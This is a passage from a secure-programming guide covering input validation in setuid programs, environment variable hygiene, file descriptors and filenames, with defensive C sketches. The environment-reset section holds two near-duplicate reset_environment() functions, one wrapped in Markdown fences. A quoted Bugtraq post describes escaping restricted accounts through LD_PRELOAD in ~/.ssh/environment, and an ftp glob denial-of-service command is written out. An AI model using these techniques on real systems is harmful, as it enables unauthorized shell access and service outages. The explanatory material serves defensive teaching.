See <xref linkend="cross-site-malicious-content"> for a general discussion
on the topic, and see <xref linkend="filter-html"> for a specific discussion
about filtering HTML.
</para></listitem>
</itemizedlist>
</para>
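
<para>
To illustrate the storage-format case, suppose (purely as an assumption for
this example) that records are stored as colon-delimited lines of text.
The sketch below encodes each field before it is stored, so that
a colon, a percent sign, or a control character in the input
cannot be mistaken for a delimiter or a record separator.
The function name encode_field() and the percent-style encoding are
choices made for this illustration, not part of any particular file format.
</para>
<programlisting><![CDATA[
#include <stddef.h>

/* Copies in to out, replacing ':', '%', and control characters with
   "%XX" (two uppercase hex digits).  Other bytes, including those with
   the high bit set, are copied unchanged.
   Returns 0 on success; returns -1 (and makes out the empty string if
   possible) when an argument is invalid or out is too small. */
int encode_field(const char *in, char *out, size_t out_size)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t used = 0;

    if (in == NULL || out == NULL || out_size == 0)
        return -1;
    for (; *in != '\0'; in++) {
        unsigned char c = (unsigned char)*in;

        if (c == ':' || c == '%' || c < 0x20 || c == 0x7f) {
            if (out_size - used < 4) {      /* 3 characters plus the NIL */
                out[0] = '\0';
                return -1;
            }
            out[used++] = '%';
            out[used++] = hex[c >> 4];
            out[used++] = hex[c & 0x0f];
        } else {
            if (out_size - used < 2) {      /* 1 character plus the NIL */
                out[0] = '\0';
                return -1;
            }
            out[used++] = (char)c;
        }
    }
    out[used] = '\0';
    return 0;
}
]]></programlisting>
<para>
The percent sign itself is encoded so that the encoding can be reversed
unambiguously when the record is read back.
</para>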

<para>
These tests should usually be centralized in one place so that the
validity tests can be easily examined for correctness later.
</para>

<para>
Make sure that your validity test is actually correct; this is particularly
a problem when checking input that will be used by another program
(such as a filename, email address, or URL).
Often these tests have subtle errors, producing the so-called
``deputy problem'' (where the checking program
makes different assumptions than the program that actually uses the data).
If there's a relevant standard, look at it, but also search to see if
the program has extensions that you need to know about.
</para>

<para>
While parsing user input, it's a good idea to temporarily drop all privileges,
or even create separate processes (with the parser having permanently dropped
privileges, and the other process performing security checks against the
parser requests).
This is especially true if the parsing task is complex (e.g., if you use
a lex-like or yacc-like tool), or if the programming language
doesn't protect against buffer overflows (e.g., C and C++).
See
<xref linkend="minimize-privileges">
for more information on minimizing privileges.
</para>
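
<para>
Here is a rough sketch of the ``temporarily drop privileges'' idea for a
setuid program, using the seteuid(2) call.
The function names are invented for this example, and count_commas() is
only a stand-in for a real parser.
A setgid program would need the analogous setegid(2) calls as well.
Keep in mind that a temporary drop can be undone by an attacker who
manages to run arbitrary code inside the parser,
which is why a separate process with permanently dropped privileges
is the stronger option.
</para>
<programlisting><![CDATA[
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Stand-in for a real parser (hypothetical): counts commas in its input. */
int count_commas(const char *input)
{
    int commas = 0;

    for (; *input != '\0'; input++)
        if (*input == ',')
            commas++;
    return commas;
}

/* Runs parse(input) with the effective user ID temporarily set to the
   real user ID, then restores the original effective user ID.
   Returns 0 and stores the parser's result in *result on success;
   returns -1 if privileges could not be dropped or restored. */
int parse_with_privileges_dropped(int (*parse)(const char *),
                                  const char *input, int *result)
{
    uid_t privileged_uid = geteuid();
    int parsed;

    if (parse == NULL || input == NULL || result == NULL)
        return -1;
    if (seteuid(getuid()) != 0)
        return -1;              /* could not drop: do not parse at all */
    parsed = parse(input);
    if (seteuid(privileged_uid) != 0)
        return -1;              /* could not restore: report failure */
    *result = parsed;
    return 0;
}
]]></programlisting>
<para>
In a program that is not setuid, both seteuid() calls are harmless no-ops,
so the same code path can be exercised during ordinary testing.
</para>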

<para>
When using data for security decisions (e.g., ``let this user in''),
be sure to use trustworthy channels.
For example, on a public Internet, don't just use the machine IP address
or port number as the sole way to authenticate users, because in most
environments this information can be set
by the (potentially malicious) user.
See
<xref linkend="trustworthy-channels"> for more information.
</para>

<para>
The following subsections discuss different kinds of inputs to a program;
note that input includes process state such as environment variables,
umask values, and so on.
Not all inputs are under the control of an untrusted user, so you need
only worry about those inputs that are.
</para>

<sect1 id="command-line">
<title>Command line</title>

<para>
Many programs take input from the command line.
A setuid/setgid program's command line data is provided by
an untrusted user, so a setuid/setgid program must defend itself from
potentially hostile command line values.
Attackers can send just about any kind of data through a command line
(through calls such as the execve(2) call).
Therefore, setuid/setgid programs must completely
validate the command line inputs and
must not trust the name of the program reported by command line argument zero
(an attacker can set it to any value including NULL).
</para>
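
<para>
A setuid/setgid program might begin with a sanity check along these lines
before it looks at any individual argument.
This is only a sketch; the limits MAX_ARGS and MAX_ARG_LEN and the function
names are assumptions chosen for the example.
Note that the check never uses argument zero for anything other than
confirming that it is present and of reasonable length.
</para>
<programlisting><![CDATA[
#include <stddef.h>

/* Hypothetical limits, for illustration only. */
#define MAX_ARGS    16
#define MAX_ARG_LEN 255

/* Returns 1 if s is terminated within its first limit bytes. */
static int shorter_than(const char *s, size_t limit)
{
    size_t i;

    for (i = 0; i < limit; i++)
        if (s[i] == '\0')
            return 1;
    return 0;
}

/* Returns 1 if the argument vector has a sane shape, 0 otherwise.
   An attacker using execve() can supply argc == 0, a NULL argv[0],
   or arbitrarily long arguments, so none of that is assumed away. */
int arguments_are_acceptable(int argc, char *const argv[])
{
    int i;

    if (argv == NULL || argc < 1 || argc > MAX_ARGS)
        return 0;
    for (i = 0; i < argc; i++) {
        if (argv[i] == NULL)
            return 0;
        if (!shorter_than(argv[i], MAX_ARG_LEN + 1))
            return 0;
    }
    return 1;
}
]]></programlisting>
<para>
Each argument that passes this check still needs its own validation
against a pattern of legal values; this step only rules out malformed
argument vectors.
</para>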

</sect1>

<sect1 id="environment-variables">
<title>Environment Variables</title>

<para>
By default, environment variables are inherited from a process' parent.
However, when a program executes another program, the calling program
can set the environment variables to arbitrary values.
This is dangerous to setuid/setgid programs, because their invoker can
completely control the environment variables they're given.
Since they are usually inherited, this also applies transitively; a
secure program might call some other program and, without special measures,
would pass potentially dangerous environment variable values on to the
program it calls.
The following subsections discuss environment variables and what to
do with them.
</para>

<sect2 id="env-vars-dangerous">
<title>Some Environment Variables are Dangerous</title>

<para>
Some environment variables are dangerous because
many libraries and programs are controlled by environment
variables in ways that are obscure, subtle, or undocumented.
For example, the IFS variable is used by the <emphasis remap="it">sh</emphasis> and <emphasis remap="it">bash</emphasis>
shells to determine which characters separate command line arguments.
Since the shell is invoked by several low-level calls
(like system(3) and popen(3) in C, or the back-tick operator in Perl),
setting IFS to unusual values can subvert apparently-safe calls.
This behavior is documented in bash and sh, but it's obscure;
many long-time users only know about IFS because of its use in breaking
security, not because it's actually used very often for its intended purpose.
What is worse is that not all environment variables are documented, and
even if they are, those other programs may change and add dangerous
environment variables.
Thus, the only real solution (described below) is to select the ones you
need and throw away the rest.
</para>

</sect2>

<sect2 id="env-storage-dangerous">
<title>Environment Variable Storage Format is Dangerous</title>

<para>
Normally, programs should use the standard access routines to access
environment variables.
For example, in C, you should get values
using getenv(3), set them using the
POSIX standard routine putenv(3) or the BSD extension setenv(3)
and eliminate environment variables using unsetenv(3).
I should note here that setenv(3) is implemented in Linux, too.
</para>

<para>
However, crackers need not be so nice; crackers can directly control the
environment variable data area passed to a program using execve(2).
This permits some nasty attacks, which can only be understood by
understanding how environment variables really work.
In Linux, you can see environ(5) for a summary of how environment variables
really work.
In short, environment variables are internally stored as a pointer to
an array of pointers to characters; this array is stored in order and
terminated by a NULL pointer (so you'll know when the array ends).
The pointers to characters, in turn, each
point to a NIL-terminated string value of the form ``NAME=value''.
This has several implications, for example, environment variable names
can't include the equal sign, and neither the name nor value can have
embedded NIL characters.
However, a more dangerous implication of this format is that it allows
multiple entries with the same variable name, but with different values
(e.g., more than one value for SHELL).
While typical command shells prohibit doing this,
a locally-executing cracker can create such a situation using execve(2).
</para>

<para>
The problem with this storage format (and the way it's set)
is that a program might check one of these values
(to see if it's valid) but actually use a different one.
In Linux,
the GNU glibc libraries try to shield programs from this;
glibc 2.1's implementation of getenv will always get the first matching
entry, setenv and putenv will always set the first matching entry, and
unsetenv will actually unset <emphasis remap="it">all</emphasis> of the matching entries
(congratulations to the GNU glibc implementers for implementing
unsetenv this way!).
However, some programs go directly to the environ variable and iterate
across all environment variables; in this case,
they might use the last matching entry instead of the first one.
As a result, if checks were made against the first matching entry instead,
but the actual value used is the last matching entry,
a cracker can use this fact to circumvent the protection routines.
</para>

</sect2>

<sect2 id="env-var-solution">
<title>The Solution - Extract and Erase</title>

<para>
For secure setuid/setgid programs, the short list of environment variables
needed as input (if any) should be carefully extracted.
Then the entire environment should be erased,
followed by resetting a small set of necessary environment
variables to safe values.
There really isn't a better way if you make any calls to subordinate
programs; there's no practical
method of listing ``all the dangerous values''.
Even if you reviewed the source code of every program you call
directly or indirectly,
someone may add new undocumented environment variables after you
write your code, and one of them may be exploitable.
</para>

<para>
The simple way to erase the environment in C/C++
is by setting the global variable
<emphasis remap="it">environ</emphasis>
to NULL.
The global variable environ is defined in &lt;unistd.h&gt;; C/C++ users will
want to &num;include this header file.
You will need to manipulate this value before spawning threads, but that's
rarely a problem, since you want to do these manipulations very early in
the program's execution (usually before threads are spawned).
</para>

<para>
The global variable environ is defined in various standards; it's
not clear that the official standards condone directly changing its value,
but I'm unaware of any Unix-like system that has trouble
with doing this.
I normally just modify the ``environ'' directly;
manipulating such low-level components is possibly non-portable, but
it assures you that you get a clean (and safe) environment.
In the rare case where you need later access to the entire set of
variables, you could save the ``environ'' variable's value somewhere,
but this is rarely necessary; nearly all programs need only a few values,
and the rest can be dropped.
</para>

<para>
Another way to clear the environment
is to use the undocumented clearenv() function.
The function
clearenv() has an odd history; it was supposed to be defined in POSIX.1, but
somehow never made it into that standard.
However, clearenv() is defined in POSIX.9
(the Fortran 77 bindings to POSIX), so there is a quasi-official status for it.
In Linux,
clearenv() is defined in &lt;stdlib.h&gt;, but before using &num;include
to include it you must make sure that &lowbar;&lowbar;USE&lowbar;MISC is &num;defined.
A somewhat more ``official'' way to cause __USE_MISC to be defined
is to first #define either _SVID_SOURCE or _BSD_SOURCE, and then
#include &lt;features.h&gt; -
these are the official feature test macros.
</para>


<para>
One environment value you'll almost certainly re-add is PATH,
the list of directories to search for programs; PATH should
<emphasis remap="it">not</emphasis> include the current directory and should usually be something simple like
``/bin:/usr/bin''.
Typically you'll also set
IFS (to its default of `` \t\n'', where space is the first character)
and TZ (timezone).
Linux won't die if you don't supply either IFS or TZ,
but some System V based systems have problems if you don't supply a TZ value,
and it's rumored that some shells need the IFS value set.
In Linux, see environ(5) for a list of common environment variables that you
<emphasis remap="it">might</emphasis> want to set.
</para>
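
<para>
Putting the extract-and-erase steps together, a minimal sketch in C might
look like the following.
It assumes that TZ is the only value the program wants to keep, and the
function names and the rule for what counts as a sane TZ value are
invented for this example.
Instead of setting environ to NULL it points environ at an empty,
NULL-terminated array, which is a slightly more cautious variant of the
same idea.
The header declaration of environ is not relied upon;
the sketch declares it explicitly.
</para>
<programlisting><![CDATA[
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

#define MAX_TZ_LEN 64

static char *empty_environment[] = { NULL };

/* Hypothetical rule: a TZ value is kept only if it is short, does not
   start with '/', and contains only letters, digits, '+', '-', '_', '/'. */
static int tz_looks_sane(const char *tz)
{
    static const char legal[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
        "0123456789+-_/";
    size_t len = strlen(tz);

    if (len == 0 || len > MAX_TZ_LEN || tz[0] == '/')
        return 0;
    return strspn(tz, legal) == len;
}

/* Extracts TZ (if acceptable), erases the whole environment, and then
   sets PATH, IFS, and TZ to safe values.
   Returns 0 on success and -1 if a variable could not be set. */
int reset_environment(void)
{
    char tz[MAX_TZ_LEN + 1] = "";
    const char *old_tz = getenv("TZ");

    /* Step 1: extract and validate the few values that are needed. */
    if (old_tz != NULL && tz_looks_sane(old_tz))
        strcpy(tz, old_tz);     /* length was checked by tz_looks_sane() */

    /* Step 2: erase everything, including any duplicate entries. */
    environ = empty_environment;

    /* Step 3: re-add a small set of variables with safe values. */
    if (setenv("PATH", "/bin:/usr/bin", 1) != 0)
        return -1;
    if (setenv("IFS", " \t\n", 1) != 0)
        return -1;
    if (tz[0] != '\0' && setenv("TZ", tz, 1) != 0)
        return -1;
    return 0;
}
]]></programlisting>
<para>
Such a function would be called very early in main(), before any threads
are created and before any library routine that consults the environment.
</para>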

<para>
If you really need user-supplied values, check the values first
(to ensure that the values match a pattern for legal values and that they
are within some reasonable maximum length).
Ideally there would be some standard trusted file in /etc with the
information for ``standard safe environment variable values'',
but at this time there's no standard file defined for this purpose.
For something similar, you might want to examine the PAM module pam&lowbar;env
on those systems which have that module.
If you allow users to set an arbitrary environment variable, then you'll
let them subvert restricted shells (more on that below).
</para>
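<para>
As a rough illustration of the steps above, here is a minimal C sketch that
discards the inherited environment by pointing ``environ'' at an empty list
and then re-adds PATH, IFS, and (if it passes a check) TZ.
The function names reset_environment() and tz_value_ok(), the 32-character
limit, and the set of characters accepted in TZ are my own assumptions for
illustration, not part of any standard; adjust them to your program's needs.
</para>
<programlisting><![CDATA[
```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200112L   /* for setenv() */
#endif
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* Hypothetical check: accept only short TZ values made of characters
   seen in simple time zone names such as "UTC" or "EST5EDT". */
static int tz_value_ok(const char *s)
{
    size_t len = strlen(s);
    size_t i;

    if (len == 0 || len > 32)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '+' && c != '-' && c != ',' && c != '.')
            return 0;
    }
    return 1;
}

/* Drop every inherited variable, then re-add a few known-safe ones.
   Returns 0 on success, -1 if a variable could not be set. */
int reset_environment(void)
{
    static char *empty_env[] = { NULL };
    char tz_copy[33];
    const char *tz = getenv("TZ");
    int keep_tz = (tz != NULL && tz_value_ok(tz));

    if (keep_tz)
        strcpy(tz_copy, tz);      /* copy before the old list is dropped */

    environ = empty_env;          /* modify environ directly */

    if (setenv("PATH", "/bin:/usr/bin", 1) != 0)
        return -1;
    if (setenv("IFS", " \t\n", 1) != 0)
        return -1;
    if (keep_tz && setenv("TZ", tz_copy, 1) != 0)
        return -1;
    return 0;
}
```
]]></programlisting>
<para>
A setuid/setgid program would call something like reset_environment() very
early in main(), before it runs any other program or calls library routines
that consult the environment, and would exit if the call fails.
</para>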

<!-- I haven't seen ANYONE else discuss this in secure programming
     guidelines, probably because shell isn't the best place to start
     anyway, but may as well mention it. -->

<para>
If you're using a shell as your programming language,
you can use the ``/usr/bin/env'' program with the ``-'' option
(which erases all environment variables of the program being run).
Basically, you call /usr/bin/env, give it the ``-'' option,
follow that with the set of variables and their values you wish to set
(as name=value),
and then follow that with the name of the program to run and its arguments.
You usually want to call the program using the full pathname
(/usr/bin/env) and not just as ``env'', in case a user has created
a dangerous PATH value.
Note that GNU's env also accepts the options
"-i" and "--ignore-environment" as synonyms (they also erase the
environment of the program being started), but these aren't portable to
other versions of env.
</para>

<para>
If you're programming a setuid/setgid program in a language
that doesn't allow you to reset the environment directly,
one approach is to create a ``wrapper'' program.
The wrapper sets the environment to safe values, and then
calls the other program.
Beware: make sure the wrapper will actually invoke the intended program;
if it's an interpreted program, make sure there's no race condition possible
that would allow the interpreter to load a different program than the one
that was granted the special setuid/setgid privileges.
</para>
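<para>
A wrapper along these lines can be quite small.
The following sketch assumes the wrapped program is started with execve(2)
and a fixed environment list; the names safe_env and exec_with_safe_env()
are hypothetical, and the values shown are only examples.
</para>
<programlisting><![CDATA[
```c
#include <unistd.h>

/* Fixed, known-safe environment handed to the wrapped program. */
static char *const safe_env[] = {
    "PATH=/bin:/usr/bin",
    "IFS= \t\n",
    NULL
};

/* Replace the current process with the program at `path`, passing only
   safe_env.  `path` should be an absolute pathname chosen by the
   wrapper's author, never one supplied by the user.
   Returns only if execve() fails, in which case the result is -1. */
int exec_with_safe_env(const char *path, char *const argv[])
{
    return execve(path, argv, safe_env);
}
```
]]></programlisting>
<para>
Because execve(2) is handed the pathname directly, no PATH search takes place.
This sketch does nothing about the interpreter race condition mentioned
above; that has to be handled separately.
</para>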
</sect2>

<sect2 id="env-var-dontset">
<title>Don't Let Users Set Their Own Environment Variables</title>

<para>
If you allow users to set their own environment variables,
then users will be able to escape out of restricted accounts
(these are accounts that are supposed to only let
the users run certain programs and not work as a general-purpose machine).
This includes letting users write or modify certain files in their home
directory (e.g., .login),
supporting conventions that load in environment variables from
files under the user's control (e.g., openssh's .ssh/environment file),
or supporting protocols that transfer environment variables
(e.g., the Telnet Environment Option; see CERT Advisory CA-1995-14
for more).
Restricted accounts should never be allowed to modify or add any
file directly contained in their home directory, and instead should be
given only a specific subdirectory that they are allowed to modify
(if they can modify any).
</para>

<para>
ari posted a detailed discussion of this problem on Bugtraq
on June 24, 2002:
<blockquote>
<para>
Given the similarities with certain other security issues, i'm surprised
this hasn't been discussed earlier.  If it has, people simply haven't
paid it enough attention.
</para>
<para>
This problem is not necessarily ssh-specific, though most telnet daemons
that support environment passing should already be configured to remove
dangerous variables due to a similar (and more serious) issue back in
'95 (ref: [1]).  I will give ssh-based examples here.
</para>
<para>
Scenario one:
Let's say admin bob has a host that he wants to give people ftp access
to.  Bob doesn't want anyone to have the ability to actually _log into_
his system, so instead of giving users normal shells, or even no shells,
bob gives them all (say) /usr/sbin/nologin, a program he wrote himself
in C to essentially log the attempt to syslog and exit, effectively
ending the user's session.  As far as most people are concerned, the
user can't do much with this aside from, say, setting up an encrypted
tunnel.
</para>
<para>
The thing is, bob's system uses dynamic libraries (as most do), and
/usr/sbin/nologin is dynamically linked (as most such programs are).  If
a user can set his environment variables (e.g. by uploading a
'.ssh/environment' file) and put some arbitrary file on the system (e.g.
'doevilstuff.so'), he can bypass any functionality of /usr/sbin/nologin
completely via LD_PRELOAD (or another member of the LD_* environment
family).
</para>
<para>
The user can now gain a shell on the system (with his own privileges, of
course, barring any 'UseLogin' issues (ref: [2])), and administrator
bob, if he were aware of what just occurred, would be extremely unhappy.
</para>
<para>
Granted, there are all kinds of interesting ways to (more or less) do
away with this problem.  Bob could just grit his teeth and give the ftp
users a nonexistent shell, or he could statically compile nologin,
assuming his operating system comes with static libraries.  Bob could
also, humorously, make his nologin program setuid and let the standard C
library take care of the situation.  Then, of course, there are also the
ssh-specific access controls such as AllowGroup and AllowUsers.  These
may appease the situation in this scenario, but it does not correct the
problem.
</para>
<para>
... Now, what happens if bob, instead of using /usr/sbin/nologin, wants to
use (for example) some BBS-type interface that he wrote up or
downloaded?  It can be a script written in perl or tcl or python, or it
could be a compiled program; doesn't matter.  Additionally, bob need not
be running an ftp server on this host; instead, perhaps bob uses nfs or
veritas to mount user home directories from a fileserver on his network;
this exact setup is (unfortunately) employed by many bastion hosts,
password management hosts and mail servers---to name a few.  Perhaps bob
runs an ISP, and replaces the user's shell when he doesn't pay.  With
all of these possible (and common) scenarios, bob's going to have a
somewhat more difficult time getting around the problem.
</para>
<para>
... Exploitation of the problem is simple.  The circumvention code would be
compiled into a dynamic library and LD_PRELOAD=/path/to/evil.so should
be placed into ~user/.ssh/environment (a similar environment option may
be appended to public keys in the authorized_keys file).  If no
dynamically loadable programs are executed, this will have no effect.
</para>
<para>
ISPs and universities (along with similarly affected organizations)
should compile their rejection (or otherwise restricted) binaries
statically (assuming your operating system comes with static libraries)...
</para>
<para>
Ideally, sshd (and all remote access programs that allow user-definable
environments) should strip any environment settings that libc ignores
for setuid programs.
</para>
</blockquote>
</para>
</sect2>
</sect1>

<sect1 id="file-descriptors">
<title>File Descriptors</title>

<para>
A program is passed a set of ``open file descriptors'', that is,
pre-opened files.
A setuid/setgid program must deal with the fact that the user gets to
select what files are open and to what (within their permission limits).
A setuid/setgid program must not assume that opening a new file will always
open into a fixed file descriptor id, or that the open will succeed at all.
It must also not assume that standard input (stdin),
standard output (stdout), and standard error (stderr)
refer to a terminal or are even open.
</para>

<para>
The rationale behind this is simple: since an attacker can open or
close a file descriptor before starting the program,
the attacker could create an unexpected situation.
If the attacker closes the standard output, when the program opens
the next file it will be opened as though it were standard output,
and then it will send all standard output to that file as well.
Some C libraries will automatically open stdin, stdout, and stderr
(to /dev/null) if they aren't already open, but this isn't true on
all Unix-like systems.
Also, these libraries can't be completely depended on; for example,
on some systems it's possible to create a race condition
that causes this automatic opening to fail (and still run the program).
<!-- OpenBSD, May 2002; see Bugtraq -->
</para>
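<para>
One common defensive step, sketched below, is to make sure descriptors
0, 1, and 2 are all open before doing anything else, attaching any that are
closed to /dev/null.
The function name ensure_std_fds_open() is hypothetical, and the sketch
assumes /dev/null exists and can be opened.
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <unistd.h>

/* Make sure descriptors 0, 1 and 2 are all open, attaching any that
   are closed to /dev/null.  Returns 0 on success, -1 on failure. */
int ensure_std_fds_open(void)
{
    int fd;

    /* open() returns the lowest unused descriptor, so every closed
       standard descriptor is filled before a number above 2 appears. */
    do {
        fd = open("/dev/null", O_RDWR);
    } while (fd >= 0 && fd <= 2);

    if (fd < 0)
        return -1;      /* could not open /dev/null; caller should abort */
    close(fd);          /* the extra descriptor is not needed */
    return 0;
}
```
]]></programlisting>
<para>
This needs to run before the program opens any file of its own; if it
fails, the safest response is to exit immediately.
</para>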
</sect1>

<sect1 id="file-names">
<title>File Names</title>
<para>
The names of files can, in certain circumstances, cause serious problems.
This is especially a problem for secure programs that run on computers
with local untrusted users, but this isn't limited to that circumstance.
Remote users may be able to trick a program into creating undesirable
filenames (programs should prevent this, but not all do), or remote
users may have partially penetrated a system and try using this trick
to penetrate the rest of the system.
</para>
<para>
Usually you will not want to accept ``..''
(higher directory) as a legal value from an untrusted user, though
that depends on the circumstances.
You might also want to list only the characters you will permit, and
forbid any filenames that don't match the list.
It's best to prohibit any change in directory, e.g., by not
including ``/'' in the set of legal characters, if you're taking data
from an external user and transforming it into a filename.
</para>
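<para>
Here is a minimal sketch of such a ``list what you permit'' check in C.
The function name filename_ok(), the particular set of permitted characters,
and the 255-byte length limit are assumptions I've chosen for illustration;
your application may reasonably need a different list.
</para>
<programlisting><![CDATA[
```c
#include <string.h>

/* Return 1 if `name` is acceptable as a single filename component,
   0 otherwise.  The permitted set is an illustrative assumption. */
int filename_ok(const char *name)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789._-";
    size_t len = strlen(name);

    if (len == 0 || len > 255)
        return 0;               /* empty or unreasonably long */
    if (name[0] == '-' || name[0] == '.')
        return 0;               /* rejects option look-alikes, "." and ".." */
    if (strspn(name, allowed) != len)
        return 0;               /* contains a character not on the list */
    return 1;
}
```
]]></programlisting>
<para>
Since ``/'' is not in the permitted set, a name that passes this check
cannot change directory.
</para>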

<para>
Often you shouldn't support ``globbing'', that is,
expanding filenames using ``*'', ``?'', ``['' (matching ``]''),
and possibly ``{'' (matching ``}'').
For example, the command ``ls *.png'' does a glob on ``*.png'' to list
all PNG files.
The C fopen(3) function (for example) doesn't do globbing, but the command
shells perform globbing by default, and in C you can request globbing
using (for example) glob(3).
If you don't need globbing, just use the calls that don't do it where
possible (e.g., fopen(3)) and/or disable it
(e.g., escape the globbing characters in a shell).
Be especially careful if you want to permit globbing.
Globbing can be useful, but complex globs can take a great deal of computing
time.
For example, on some ftp servers, performing a few of these requests can
easily cause a denial-of-service of the entire machine:
<programlisting>
ftp&gt; ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
</programlisting>
<!-- http://lwn.net/2001/0322/a/ftpd-dos.php3 -->
Trying to allow globbing, yet limit globbing patterns, is probably futile.
Instead, make sure that any such programs run as a separate process and
use process limits to limit the amount of CPU and other resources
they can consume.
See <xref linkend="minimize-resources"> for more information on this
approach, and see <xref linkend="quotas"> for more information
on how to set these limits.
</para>
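<para>
To make the ``separate process with limits'' idea concrete, here is a
small sketch that performs a glob(3) in a child process whose CPU time is
capped with setrlimit(2).
The function name glob_in_limited_child() is hypothetical, and printing the
matches to standard output is just a stand-in for whatever the real
program would do with them.
</para>
<programlisting><![CDATA[
```c
#include <glob.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Expand `pattern` in a child limited to `cpu_seconds` of CPU time.
   Returns 0 if the child finished and found matches, -1 otherwise
   (including when the child was killed for exceeding its limit). */
int glob_in_limited_child(const char *pattern, rlim_t cpu_seconds)
{
    pid_t pid;
    int status;

    fflush(NULL);                   /* don't duplicate buffered output */
    pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {                 /* child: limit itself, then glob */
        struct rlimit rl;
        glob_t results;
        size_t i;

        if (getrlimit(RLIMIT_CPU, &rl) != 0)
            _exit(2);
        /* Only ever lower the hard limit; raising it may be refused. */
        if (rl.rlim_max == RLIM_INFINITY || cpu_seconds < rl.rlim_max)
            rl.rlim_max = cpu_seconds;
        rl.rlim_cur = rl.rlim_max;
        if (setrlimit(RLIMIT_CPU, &rl) != 0)
            _exit(2);

        if (glob(pattern, 0, NULL, &results) != 0)
            _exit(1);               /* no match, or an error */
        for (i = 0; i < results.gl_pathc; i++)
            puts(results.gl_pathv[i]);
        fflush(stdout);
        globfree(&results);
        _exit(0);
    }

    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```
]]></programlisting>
<para>
A real server would probably limit memory and other resources in the child
as well; CPU time is shown here only because it is the resource the
example attack above consumes.
</para>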

<para>
Unix-like systems generally forbid including the NIL character in a filename
(since this marks the end of the name) and the '/' character
(since this is the directory separator).
However, they often permit anything else, which is a problem;
it is easy to write programs that can be subverted by cleverly-created
filenames.
</para>
<para>
Filenames that can especially cause problems include:
<itemizedlist>
<listitem><para>
Filenames with leading dashes (-).
If passed to other programs, this may cause the other programs to
misinterpret the name as option settings.
Ideally, Unix-like systems shouldn't allow these filenames;
they aren't needed and create many unnecessary security problems.
Unfortunately, currently developers have to deal with them.
Thus, whenever calling another program with a filename, insert
``--'' before the filename parameters (to stop option processing, if
the program supports this common request) or modify the filename
(e.g., insert ``./'' in front of the filename to keep the dash from
being the lead character).
</para></listitem>
<listitem><para>
Filenames with control characters.
This especially includes newlines and carriage returns (which are
often confused as argument separators inside shell scripts, or can
split log entries into multiple entries) and the
ESCAPE character (which can interfere with terminal emulators, causing
them to perform undesired actions outside the user's control).
Ideally, Unix-like systems shouldn't allow these filenames either;
they aren't needed and create many unnecessary security problems.
</para></listitem>
<listitem><para>
Filenames with spaces; a shell can sometimes split these into
multiple arguments, with the other arguments causing problems.
Since other operating systems allow spaces in filenames (including
Windows and MacOS), for interoperability's sake this will probably
always be permitted.
Please be careful in dealing with them, e.g., in the shell use
double-quotes around all filename parameters whenever calling another
program.
You might want to forbid leading and trailing spaces at least; these
aren't as visible as when they occur in other places, and can confuse
human users.
</para></listitem>
<listitem><para>
Invalid character encoding.
For example, a program may believe that the filename is UTF-8 encoded,
but it may have an invalidly long UTF-8 encoding.
See <xref linkend="character-encoding-utf8"> for more information.
I'd like to see agreement on the character encoding used for filenames
(e.g., UTF-8), and then have the operating system enforce the encoding
(so that only legal encodings are allowed), but that hasn't happened
at this time.
</para></listitem>
<listitem><para>
Any other characters special to internal data formats, such as ``&lt;'',
``;'', quote characters, backslash, and so on.
</para></listitem>
</itemizedlist>
</para>
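<para>
Two of the checks in the list above are easy to sketch in C: detecting
control characters, and keeping a leading dash from being read as an option
by putting ``./'' in front of the name.
The function names has_control_char() and protect_leading_dash() are
hypothetical helpers of my own, not library routines.
</para>
<programlisting><![CDATA[
```c
#include <ctype.h>
#include <stdio.h>

/* Return 1 if `name` contains a control character (newline, carriage
   return, ESCAPE, and so on), 0 otherwise. */
int has_control_char(const char *name)
{
    for (; *name != '\0'; name++)
        if (iscntrl((unsigned char)*name))
            return 1;
    return 0;
}

/* Copy `name` into `out`, putting "./" in front if it starts with a
   dash.  Returns 0 on success, -1 if `out` is too small. */
int protect_leading_dash(const char *name, char *out, size_t outsize)
{
    const char *prefix = (name[0] == '-') ? "./" : "";
    int n = snprintf(out, outsize, "%s%s", prefix, name);

    return (n >= 0 && (size_t)n < outsize) ? 0 : -1;
}
```
]]></programlisting>
<para>
When the called program supports it, passing ``--'' before the filename
arguments is a useful second line of defense in addition to this.
</para>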
</sect1>


<sect1 id="file-contents">
<title>File Contents</title>

<para>
If a program takes directions from a file, it must not trust that file
specially unless only a trusted user can control its contents.
Usually this means that an untrusted user must not be able to modify the file,
its directory, or any of its ancestor directories.
Otherwise, the file must be treated as suspect.
</para>
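<para>
As a partial illustration, the sketch below opens a file and accepts it
only if it is a regular file, owned by root or a given trusted user, and
not writable by group or others.
The function name open_trusted_file() is hypothetical.
Note that this checks only the file itself; the same ownership and
permission test would still have to be applied to its directory and every
ancestor directory, which this sketch does not do.
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Open `path` read-only and return the descriptor only if the file is
   a regular file owned by root or `trusted_uid` and not writable by
   group or others.  Returns -1 otherwise. */
int open_trusted_file(const char *path, uid_t trusted_uid)
{
    struct stat st;
    int fd = open(path, O_RDONLY);

    if (fd < 0)
        return -1;
    /* fstat() the open descriptor, so the checks apply to the file
       actually opened rather than to whatever the name refers to later. */
    if (fstat(fd, &st) != 0
        || !S_ISREG(st.st_mode)
        || (st.st_uid != 0 && st.st_uid != trusted_uid)
        || (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```
]]></programlisting>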

<para>
If the directions in the file are supposed to be from an untrusted user,
then make sure that the inputs from the file are protected as described
throughout this book.
